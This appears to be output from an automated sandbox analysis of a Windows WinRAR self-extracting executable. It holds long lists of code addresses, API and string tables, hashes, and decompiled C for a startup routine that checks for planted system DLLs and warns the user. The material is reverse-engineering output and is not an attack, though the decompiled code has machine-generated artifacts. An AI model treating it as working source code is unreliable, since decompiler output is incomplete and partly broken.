                                                                                                                                                    0x0122ae56
                                                                                                                                                    0x0122ae60
                                                                                                                                                    0x0122ae60
                                                                                                                                                    0x0122ae66
                                                                                                                                                    0x0122b50b
                                                                                                                                                    0x0122b50c
                                                                                                                                                    0x0122b511
                                                                                                                                                    0x0122b518
                                                                                                                                                    0x0122b519
                                                                                                                                                    0x0122b51f
                                                                                                                                                    0x0122b525
                                                                                                                                                    0x0122b527
                                                                                                                                                    0x0122b531
                                                                                                                                                    0x0122b531
                                                                                                                                                    0x0122b537
                                                                                                                                                    0x0122b53c
                                                                                                                                                    0x0122b53e
                                                                                                                                                    0x0122b54b
                                                                                                                                                    0x0122b54b
                                                                                                                                                    0x0122b554
                                                                                                                                                    0x0122b567
                                                                                                                                                    0x0122b56a
                                                                                                                                                    0x0122b57c
                                                                                                                                                    0x0122b584
                                                                                                                                                    0x0122b58a
                                                                                                                                                    0x0122b592
                                                                                                                                                    0x0122b594
                                                                                                                                                    0x0122b597
                                                                                                                                                    0x0122b59c
                                                                                                                                                    0x0122b59e
                                                                                                                                                    0x0122b59e
                                                                                                                                                    0x0122b5a6
                                                                                                                                                    0x0122b5ad
                                                                                                                                                    0x0122b5b2
                                                                                                                                                    0x0122b5b7
                                                                                                                                                    0x0122b5bc
                                                                                                                                                    0x0122b5c1
                                                                                                                                                    0x0122b5c2
                                                                                                                                                    0x0122b5c9
                                                                                                                                                    0x0122b5ce
                                                                                                                                                    0x0122b5d0
                                                                                                                                                    0x0122b5d2
                                                                                                                                                    0x0122b5d2
                                                                                                                                                    0x0122b5d8
                                                                                                                                                    0x0122b5df
                                                                                                                                                    0x0122b5e1
                                                                                                                                                    0x0122b5e3
                                                                                                                                                    0x0122b5e9
                                                                                                                                                    0x0122b5ea
                                                                                                                                                    0x0122b5ea
                                                                                                                                                    0x0122b5ef
                                                                                                                                                    0x0122b5f6
                                                                                                                                                    0x0122b606
                                                                                                                                                    0x0122b619
                                                                                                                                                    0x0122b619
                                                                                                                                                    0x0122b61f
                                                                                                                                                    0x0122b626
                                                                                                                                                    0x0122b6d7
                                                                                                                                                    0x0122b6d7
                                                                                                                                                    0x0122b6de
                                                                                                                                                    0x0122b787
                                                                                                                                                    0x0122b787
                                                                                                                                                    0x0122b78e
                                                                                                                                                    0x0122b793
                                                                                                                                                    0x0122b793
                                                                                                                                                    0x0122b799
                                                                                                                                                    0x0122b7a0
                                                                                                                                                    0x0122b7a7
                                                                                                                                                    0x0122b7b1
                                                                                                                                                    0x0122b7b1
                                                                                                                                                    0x0122b7b6
                                                                                                                                                    0x0122b7bb
                                                                                                                                                    0x0122b7bd
                                                                                                                                                    0x0122b7bf
                                                                                                                                                    0x0122b7c6
                                                                                                                                                    0x0122b7c8
                                                                                                                                                    0x0122b7ca
                                                                                                                                                    0x0122b7cb
                                                                                                                                                    0x0122b7d0
                                                                                                                                                    0x0122b7d1
                                                                                                                                                    0x0122b7d3
                                                                                                                                                    0x0122b7dd
                                                                                                                                                    0x0122b7d5
                                                                                                                                                    0x0122b7d5
                                                                                                                                                    0x0122b7d5
                                                                                                                                                    0x0122b7d3
                                                                                                                                                    0x0122b7c6
                                                                                                                                                    0x0122b7e3
                                                                                                                                                    0x0122b7ea
                                                                                                                                                    0x0122b7f9
                                                                                                                                                    0x0122b7f9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b7ea
                                                                                                                                                    0x0122b6e4
                                                                                                                                                    0x0122b6eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b6f1
                                                                                                                                                    0x0122b6f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b6fe
                                                                                                                                                    0x0122b700
                                                                                                                                                    0x0122b705
                                                                                                                                                    0x0122b70c
                                                                                                                                                    0x0122b70c
                                                                                                                                                    0x0122b712
                                                                                                                                                    0x0122b71d
                                                                                                                                                    0x0122b71d
                                                                                                                                                    0x0122b723
                                                                                                                                                    0x0122b72e
                                                                                                                                                    0x0122b73f
                                                                                                                                                    0x0122b757
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b757
                                                                                                                                                    0x0122b725
                                                                                                                                                    0x0122b72c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b72c
                                                                                                                                                    0x0122b714
                                                                                                                                                    0x0122b71b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b75c
                                                                                                                                                    0x0122b75c
                                                                                                                                                    0x0122b75d
                                                                                                                                                    0x0122b75d
                                                                                                                                                    0x0122b765
                                                                                                                                                    0x0122b77f
                                                                                                                                                    0x0122b784
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b62c
                                                                                                                                                    0x0122b62c
                                                                                                                                                    0x0122b62e
                                                                                                                                                    0x0122b634
                                                                                                                                                    0x0122b635
                                                                                                                                                    0x0122b63a
                                                                                                                                                    0x0122b63f
                                                                                                                                                    0x0122b641
                                                                                                                                                    0x0122b643
                                                                                                                                                    0x0122b64a
                                                                                                                                                    0x0122b64c
                                                                                                                                                    0x0122b660
                                                                                                                                                    0x0122b66b
                                                                                                                                                    0x0122b670
                                                                                                                                                    0x0122b670
                                                                                                                                                    0x0122b64a
                                                                                                                                                    0x0122b671
                                                                                                                                                    0x0122b677
                                                                                                                                                    0x0122b6ca
                                                                                                                                                    0x0122b6ca
                                                                                                                                                    0x0122b6cb
                                                                                                                                                    0x0122b6d1
                                                                                                                                                    0x0122b6d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b679
                                                                                                                                                    0x0122b67a
                                                                                                                                                    0x0122b680
                                                                                                                                                    0x0122b686
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b688
                                                                                                                                                    0x0122b68f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b691
                                                                                                                                                    0x0122b693
                                                                                                                                                    0x0122b699
                                                                                                                                                    0x0122b69a
                                                                                                                                                    0x0122b69f
                                                                                                                                                    0x0122b6a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b6bc
                                                                                                                                                    0x0122b6c2
                                                                                                                                                    0x0122b6c4
                                                                                                                                                    0x0122afab
                                                                                                                                                    0x0122afab
                                                                                                                                                    0x0122afb1
                                                                                                                                                    0x0122afb1
                                                                                                                                                    0x0122aed6
                                                                                                                                                    0x0122aed7
                                                                                                                                                    0x0122b7ff
                                                                                                                                                    0x0122b7ff
                                                                                                                                                    0x0122b801
                                                                                                                                                    0x0122b807
                                                                                                                                                    0x0122b811
                                                                                                                                                    0x0122b811
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b6c4
                                                                                                                                                    0x0122b677
                                                                                                                                                    0x0122b626
                                                                                                                                                    0x0122ae6c
                                                                                                                                                    0x0122ae6f
                                                                                                                                                    0x0122ae83
                                                                                                                                                    0x0122ae83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ae83
                                                                                                                                                    0x0122ae74
                                                                                                                                                    0x0122ae74
                                                                                                                                                    0x0122ae77
                                                                                                                                                    0x0122aee2
                                                                                                                                                    0x0122aee9
                                                                                                                                                    0x0122af81
                                                                                                                                                    0x0122af90
                                                                                                                                                    0x0122af96
                                                                                                                                                    0x0122af9d
                                                                                                                                                    0x0122afb7
                                                                                                                                                    0x0122afbe
                                                                                                                                                    0x0122afda
                                                                                                                                                    0x0122afdc
                                                                                                                                                    0x0122afe2
                                                                                                                                                    0x0122afed
                                                                                                                                                    0x0122afff
                                                                                                                                                    0x0122afff
                                                                                                                                                    0x0122b006
                                                                                                                                                    0x0122b00c
                                                                                                                                                    0x0122b013
                                                                                                                                                    0x0122b02d
                                                                                                                                                    0x0122b041
                                                                                                                                                    0x0122b04e
                                                                                                                                                    0x0122b071
                                                                                                                                                    0x0122b076
                                                                                                                                                    0x0122b07f
                                                                                                                                                    0x0122b080
                                                                                                                                                    0x0122b081
                                                                                                                                                    0x0122b015
                                                                                                                                                    0x0122b01f
                                                                                                                                                    0x0122b020
                                                                                                                                                    0x0122b021
                                                                                                                                                    0x0122b026
                                                                                                                                                    0x0122b026
                                                                                                                                                    0x0122b086
                                                                                                                                                    0x0122b08d
                                                                                                                                                    0x0122b096
                                                                                                                                                    0x0122b096
                                                                                                                                                    0x0122b09b
                                                                                                                                                    0x0122b0a4
                                                                                                                                                    0x0122b0a5
                                                                                                                                                    0x0122b0a8
                                                                                                                                                    0x0122b0af
                                                                                                                                                    0x0122b0b0
                                                                                                                                                    0x0122b0b2
                                                                                                                                                    0x0122b0c9
                                                                                                                                                    0x0122b0d5
                                                                                                                                                    0x0122b0d7
                                                                                                                                                    0x0122b0da
                                                                                                                                                    0x0122b0dc
                                                                                                                                                    0x0122b0f3
                                                                                                                                                    0x0122b0f3
                                                                                                                                                    0x0122b0f6
                                                                                                                                                    0x0122b0f6
                                                                                                                                                    0x0122b0fc
                                                                                                                                                    0x0122b0fe
                                                                                                                                                    0x0122b16d
                                                                                                                                                    0x0122b16d
                                                                                                                                                    0x0122b171
                                                                                                                                                    0x0122b3b1
                                                                                                                                                    0x0122b3b7
                                                                                                                                                    0x0122b3c1
                                                                                                                                                    0x0122b3d3
                                                                                                                                                    0x0122b3dd
                                                                                                                                                    0x0122b3ea
                                                                                                                                                    0x0122b3f9
                                                                                                                                                    0x0122b3fb
                                                                                                                                                    0x0122b3fd
                                                                                                                                                    0x0122b408
                                                                                                                                                    0x0122b408
                                                                                                                                                    0x0122b411
                                                                                                                                                    0x0122b411
                                                                                                                                                    0x0122b417
                                                                                                                                                    0x0122b419
                                                                                                                                                    0x0122b41f
                                                                                                                                                    0x0122b420
                                                                                                                                                    0x0122b425
                                                                                                                                                    0x0122b427
                                                                                                                                                    0x0122b42d
                                                                                                                                                    0x0122b42e
                                                                                                                                                    0x0122b433
                                                                                                                                                    0x0122b438
                                                                                                                                                    0x0122b439
                                                                                                                                                    0x0122b43f
                                                                                                                                                    0x0122b444
                                                                                                                                                    0x0122b446
                                                                                                                                                    0x0122b44c
                                                                                                                                                    0x0122b453
                                                                                                                                                    0x0122b454
                                                                                                                                                    0x0122b459
                                                                                                                                                    0x0122b460
                                                                                                                                                    0x0122b462
                                                                                                                                                    0x0122b469
                                                                                                                                                    0x0122b46b
                                                                                                                                                    0x0122b472
                                                                                                                                                    0x0122b474
                                                                                                                                                    0x0122b476
                                                                                                                                                    0x0122b47c
                                                                                                                                                    0x0122b47d
                                                                                                                                                    0x0122b47d
                                                                                                                                                    0x0122b472
                                                                                                                                                    0x0122b469
                                                                                                                                                    0x0122b485
                                                                                                                                                    0x0122b48a
                                                                                                                                                    0x0122b48a
                                                                                                                                                    0x0122b491
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b491
                                                                                                                                                    0x0122b177
                                                                                                                                                    0x0122b17e
                                                                                                                                                    0x0122b17e
                                                                                                                                                    0x0122b181
                                                                                                                                                    0x0122b181
                                                                                                                                                    0x0122b183
                                                                                                                                                    0x0122b187
                                                                                                                                                    0x0122b189
                                                                                                                                                    0x0122b347
                                                                                                                                                    0x0122b347
                                                                                                                                                    0x0122b34b
                                                                                                                                                    0x0122b35b
                                                                                                                                                    0x0122b374
                                                                                                                                                    0x0122b382
                                                                                                                                                    0x0122b39c
                                                                                                                                                    0x0122b3a1
                                                                                                                                                    0x0122b3a1
                                                                                                                                                    0x0122aed4
                                                                                                                                                    0x0122aed4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122aed4
                                                                                                                                                    0x0122b199
                                                                                                                                                    0x0122b1aa
                                                                                                                                                    0x0122b1b0
                                                                                                                                                    0x0122b1b5
                                                                                                                                                    0x0122b1d2
                                                                                                                                                    0x0122b1d7
                                                                                                                                                    0x0122b1da
                                                                                                                                                    0x0122b1e7
                                                                                                                                                    0x0122b1ee
                                                                                                                                                    0x0122b1f7
                                                                                                                                                    0x0122b20f
                                                                                                                                                    0x0122b212
                                                                                                                                                    0x0122b219
                                                                                                                                                    0x0122b21c
                                                                                                                                                    0x0122b21f
                                                                                                                                                    0x0122b22c
                                                                                                                                                    0x0122b22e
                                                                                                                                                    0x0122b231
                                                                                                                                                    0x0122b233
                                                                                                                                                    0x0122b2be
                                                                                                                                                    0x0122b239
                                                                                                                                                    0x0122b239
                                                                                                                                                    0x0122b240
                                                                                                                                                    0x0122b246
                                                                                                                                                    0x0122b248
                                                                                                                                                    0x0122b255
                                                                                                                                                    0x0122b255
                                                                                                                                                    0x0122b261
                                                                                                                                                    0x0122b26d
                                                                                                                                                    0x0122b279
                                                                                                                                                    0x0122b284
                                                                                                                                                    0x0122b28b
                                                                                                                                                    0x0122b290
                                                                                                                                                    0x0122b2ae
                                                                                                                                                    0x0122b2b1
                                                                                                                                                    0x0122b2b6
                                                                                                                                                    0x0122b2b6
                                                                                                                                                    0x0122b2c5
                                                                                                                                                    0x0122b2d9
                                                                                                                                                    0x0122b2ea
                                                                                                                                                    0x0122b2ef
                                                                                                                                                    0x0122b2f1
                                                                                                                                                    0x0122b32b
                                                                                                                                                    0x0122b32e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b2f3
                                                                                                                                                    0x0122b2fb
                                                                                                                                                    0x0122b301
                                                                                                                                                    0x0122b301
                                                                                                                                                    0x0122b301
                                                                                                                                                    0x0122b305
                                                                                                                                                    0x0122b308
                                                                                                                                                    0x0122b308
                                                                                                                                                    0x0122b30b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b30f
                                                                                                                                                    0x0122b318
                                                                                                                                                    0x0122b319
                                                                                                                                                    0x0122b31c
                                                                                                                                                    0x0122b31f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b31f
                                                                                                                                                    0x0122b324
                                                                                                                                                    0x0122b331
                                                                                                                                                    0x0122b331
                                                                                                                                                    0x0122b335
                                                                                                                                                    0x0122b338
                                                                                                                                                    0x0122b341
                                                                                                                                                    0x0122b341
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b335
                                                                                                                                                    0x0122b2f1
                                                                                                                                                    0x0122b100
                                                                                                                                                    0x0122b102
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b118
                                                                                                                                                    0x0122b11d
                                                                                                                                                    0x0122b126
                                                                                                                                                    0x0122b12b
                                                                                                                                                    0x0122b135
                                                                                                                                                    0x0122b137
                                                                                                                                                    0x0122b13e
                                                                                                                                                    0x0122b143
                                                                                                                                                    0x0122b146
                                                                                                                                                    0x0122b148
                                                                                                                                                    0x0122b14a
                                                                                                                                                    0x0122b150
                                                                                                                                                    0x0122b153
                                                                                                                                                    0x0122b155
                                                                                                                                                    0x0122b155
                                                                                                                                                    0x0122b153
                                                                                                                                                    0x0122b158
                                                                                                                                                    0x0122b158
                                                                                                                                                    0x0122b158
                                                                                                                                                    0x0122b162
                                                                                                                                                    0x0122b167
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b167
                                                                                                                                                    0x0122b0de
                                                                                                                                                    0x0122b0e4
                                                                                                                                                    0x0122b0e7
                                                                                                                                                    0x0122b0ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b0ec
                                                                                                                                                    0x0122b0ee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b0b4
                                                                                                                                                    0x0122b0b4
                                                                                                                                                    0x0122b0ba
                                                                                                                                                    0x0122b0bd
                                                                                                                                                    0x0122b0c4
                                                                                                                                                    0x0122b0c6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b0c6
                                                                                                                                                    0x0122b0bf
                                                                                                                                                    0x0122b0c2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b0c2
                                                                                                                                                    0x0122afc0
                                                                                                                                                    0x0122afc2
                                                                                                                                                    0x0122afc3
                                                                                                                                                    0x0122afc5
                                                                                                                                                    0x0122b496
                                                                                                                                                    0x0122b496
                                                                                                                                                    0x0122b49d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b4a3
                                                                                                                                                    0x0122b4a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b4b0
                                                                                                                                                    0x0122b4be
                                                                                                                                                    0x0122b4c4
                                                                                                                                                    0x0122b4ca
                                                                                                                                                    0x0122b4cd
                                                                                                                                                    0x0122b4d8
                                                                                                                                                    0x0122b4e2
                                                                                                                                                    0x0122b4e2
                                                                                                                                                    0x0122b4e7
                                                                                                                                                    0x0122b4ea
                                                                                                                                                    0x0122b4cf
                                                                                                                                                    0x0122b4cf
                                                                                                                                                    0x0122b4cf
                                                                                                                                                    0x0122b4f3
                                                                                                                                                    0x0122b501
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b501
                                                                                                                                                    0x0122afbe
                                                                                                                                                    0x0122afa1
                                                                                                                                                    0x0122afa2
                                                                                                                                                    0x0122afa9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122afa9
                                                                                                                                                    0x0122aeef
                                                                                                                                                    0x0122aef6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122aefc
                                                                                                                                                    0x0122aefc
                                                                                                                                                    0x0122af03
                                                                                                                                                    0x0122af08
                                                                                                                                                    0x0122af0a
                                                                                                                                                    0x0122af19
                                                                                                                                                    0x0122af21
                                                                                                                                                    0x0122af24
                                                                                                                                                    0x0122af73
                                                                                                                                                    0x0122af73
                                                                                                                                                    0x0122af7a
                                                                                                                                                    0x0122af7c
                                                                                                                                                    0x0122af7c
                                                                                                                                                    0x0122af2c
                                                                                                                                                    0x0122af33
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122af42
                                                                                                                                                    0x0122af48
                                                                                                                                                    0x0122af4a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122af50
                                                                                                                                                    0x0122af55
                                                                                                                                                    0x0122af5b
                                                                                                                                                    0x0122af5d
                                                                                                                                                    0x0122af63
                                                                                                                                                    0x0122af6d
                                                                                                                                                    0x0122af6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122af5d
                                                                                                                                                    0x0122af4a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122af73
                                                                                                                                                    0x0122aef6
                                                                                                                                                    0x0122ae79
                                                                                                                                                    0x0122ae79
                                                                                                                                                    0x0122ae7c
                                                                                                                                                    0x0122aeb7
                                                                                                                                                    0x0122aeb8
                                                                                                                                                    0x0122aebf
                                                                                                                                                    0x0122aec5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122aec7
                                                                                                                                                    0x0122aece
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122aece
                                                                                                                                                    0x0122ae7e
                                                                                                                                                    0x0122ae81
                                                                                                                                                    0x0122ae9a
                                                                                                                                                    0x0122ae9f
                                                                                                                                                    0x0122aea1
                                                                                                                                                    0x0122aead
                                                                                                                                                    0x0122aead
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122aea1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ae81
                                                                                                                                                    0x0122ae58
                                                                                                                                                    0x0122ae5a
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0122AE25
                                                                                                                                                      • Part of subcall function 0121130B: GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                      • Part of subcall function 0121130B: SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prologItemTextWindow
                                                                                                                                                    • String ID: "$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                    • API String ID: 810644672-2807239017
                                                                                                                                                    • Opcode ID: cf680d1aff7423d161a4dafc3e15925cfc632c95bd007874f6974f47319fb74f
                                                                                                                                                    • Instruction ID: 8a936163453806798551f2b1042b95c93da45729fd9ae04299cb76e2c5a0c179
                                                                                                                                                    • Opcode Fuzzy Hash: cf680d1aff7423d161a4dafc3e15925cfc632c95bd007874f6974f47319fb74f
                                                                                                                                                    • Instruction Fuzzy Hash: 0042BF7196026ABEEB32ABA4AC8DFBE3BBCEB15704F440154F741A60C9C7754984CB21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122002D, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                    			E0122002D(void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, char _a244, char _a248, short _a752, short _a756, char _a764, short _a768, char _a4844, char _a4848, void _a4856, char _a4860, short _a4864, char _a9148, char _a9156, void _a13256, signed char _a46028) {
				long _v0;
				long _v8;
				char* _t115;
				void* _t123;
				int _t127;
				long _t138;
				int _t164;
				_Unknown_base(*)()* _t173;
				signed char _t180;
				intOrPtr _t194;
				long _t196;
				void* _t197;
				_Unknown_base(*)()* _t198;
				struct HINSTANCE__* _t200;
				signed int _t202;
				signed int _t204;
				void* _t205;
				_Unknown_base(*)()* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E0122E1C0();
				_push(_t207);
				_t180 = 0;
				_t200 = GetModuleHandleW(L"kernel32");
				if(_t200 == 0) {
					L5:
					_t115 =  *0x124d080; // 0x1242b54
					_t208 = _t207 | 0xffffffff;
					_a4 = L"version.dll";
					_t201 = 0x800;
					_a8 = L"DXGIDebug.dll";
					_a12 = L"sfc_os.dll";
					_a16 = L"SSPICLI.DLL";
					_a20 = L"rsaenh.dll";
					_a24 = L"UXTheme.dll";
					_a28 = L"dwmapi.dll";
					_a32 = L"cryptbase.dll";
					_a36 = L"lpk.dll";
					_a40 = L"usp10.dll";
					_a44 = L"clbcatq.dll";
					_a48 = L"comres.dll";
					_a52 = L"ws2_32.dll";
					_a56 = L"ws2help.dll";
					_a60 = L"psapi.dll";
					_a64 = L"ieframe.dll";
					_a68 = L"ntshrui.dll";
					_a72 = L"atl.dll";
					_a76 = L"setupapi.dll";
					_a80 = L"apphelp.dll";
					_a84 = L"userenv.dll";
					_a88 = L"netapi32.dll";
					_a92 = L"shdocvw.dll";
					_a96 = L"crypt32.dll";
					_a100 = L"msasn1.dll";
					_a104 = L"cryptui.dll";
					_a108 = L"wintrust.dll";
					_a112 = L"shell32.dll";
					_a116 = L"secur32.dll";
					_a120 = L"cabinet.dll";
					_a124 = L"oleaccrc.dll";
					_a128 = L"ntmarta.dll";
					_a132 = L"profapi.dll";
					_a136 = L"WindowsCodecs.dll";
					_a140 = L"srvcli.dll";
					_a144 = L"cscapi.dll";
					_a148 = L"slc.dll";
					_a152 = L"imageres.dll";
					_a156 = L"dnsapi.DLL";
					_a160 = L"iphlpapi.DLL";
					_a164 = L"WINNSI.DLL";
					_a168 = L"netutils.dll";
					_a172 = L"mpr.dll";
					_a176 = L"devrtl.dll";
					_a180 = L"propsys.dll";
					_a184 = L"mlang.dll";
					_a188 = L"samcli.dll";
					_a192 = L"samlib.dll";
					_a196 = L"wkscli.dll";
					_a200 = L"dfscli.dll";
					_a204 = L"browcli.dll";
					_a208 = L"rasadhlp.dll";
					_a212 = L"dhcpcsvc6.dll";
					_a216 = L"dhcpcsvc.dll";
					_a220 = L"XmlLite.dll";
					_a224 = L"linkinfo.dll";
					_a228 = L"cryptsp.dll";
					_a232 = L"RpcRtRemote.dll";
					_a236 = L"aclui.dll";
					_a240 = L"dsrole.dll";
					_a244 = L"peerdist.dll";
					if( *_t115 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a768, _t201);
						E0121FD96( &_a9156, E0121BBC5(_t223,  &_a768), _t201);
						_t194 = 0;
						_t202 = 0;
						do {
							if(E0121AC35() < 0x600) {
								_t123 = 0;
								__eflags = 0;
							} else {
								_t123 = E0121FFE3( *((intOrPtr*)(_t210 + 0x14 + _t202 * 4))); // executed
							}
							if(_t123 == 0) {
								L20:
								_push(0x800);
								E0121BC3B(_t227,  &_a768,  *((intOrPtr*)(_t210 + 0x18 + _t202 * 4)));
								_t127 = GetFileAttributesW( &_a756); // executed
								if(_t127 != _t208) {
									_t194 =  *((intOrPtr*)(_t210 + 0x14 + _t202 * 4));
									L24:
									if(_t180 != 0) {
										L30:
										_t234 = _t194;
										if(_t194 == 0) {
											return _t127;
										}
										E0121BC0F(_t234,  &_a764);
										if(E0121AC35() < 0x600) {
											_push( &_a9156);
											_push( &_a764);
											E01213FD6( &_a4860, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t194);
											_t210 = _t210 + 0x18;
											_t127 = AllocConsole();
											__eflags = _t127;
											if(_t127 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t138 = E012333F3( &_a4856);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4856, _t138,  &_v8, 0);
												Sleep(0x2710);
												_t127 = FreeConsole();
											}
										} else {
											E0121FFE3(L"dwmapi.dll");
											E0121FFE3(L"uxtheme.dll");
											_push( &_a9148);
											_push( &_a756);
											E01213FD6( &_a4848, 0x864, E0121DD11(_t182, 0xf1), _t194);
											_t210 = _t210 + 0x18;
											_t127 = E01229EB3(0,  &_a4844, E0121DD11(_t182, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t204 = 0;
									while(1) {
										_push(0x800);
										E0121BC3B(0,  &_a764,  *((intOrPtr*)(_t210 + 0x38 + _t204 * 4)));
										_t127 = GetFileAttributesW( &_a752);
										if(_t127 != _t208) {
											break;
										}
										_t204 = _t204 + 1;
										if(_t204 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t194 =  *((intOrPtr*)(_t210 + 0x34 + _t204 * 4));
									goto L30;
								}
							} else {
								_t127 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x20 + _t202 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t127 - 2;
								if(_t127 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t202 = _t202 + 1;
						} while (_t202 < 8);
						goto L24;
					}
					_t196 = E01236F22(_t182, _t115);
					_pop(_t182);
					if(_t196 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4864, 0x800);
					_t205 = CreateFileW( &_a4864, 0x80000000, 1, 0, 3, 0, 0);
					if(_t205 == _t208 || SetFilePointer(_t205, _t196, 0, 0) != _t196) {
						L13:
						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E0121FB18(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E0121FFE3( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0x1242260( ~(_t180 & 0x000000ff) & 0x012425b4);
					 *_t198();
				}
